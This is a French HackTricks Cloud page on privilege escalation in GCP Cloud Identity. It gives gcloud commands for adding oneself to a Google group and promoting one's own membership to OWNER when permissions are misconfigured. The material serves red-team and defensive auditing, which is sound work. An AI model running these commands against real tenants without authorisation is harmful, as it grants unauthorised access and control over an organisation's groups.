Français - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - Cloudidentity Privesc

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks :

Cloudidentity

Pour plus d'informations sur le service cloudidentity, consultez cette page :

pageGCP - IAM, Principals & Org Policies Enum

Ajouter vous-même à un groupe

Si votre utilisateur a suffisamment de permissions ou si le groupe est mal configuré, il pourrait se rendre membre d'un nouveau groupe :

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Modifier l'appartenance à un groupe

Si votre utilisateur a suffisamment de permissions ou si le groupe est mal configuré, il pourrait se rendre PROPRIÉTAIRE d'un groupe dont il est membre :

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

D'autres façons de soutenir HackTricks :

PrécédentGCP - Cloudfunctions PrivescSuivantGCP - Cloudscheduler Privesc

Dernière mise à jour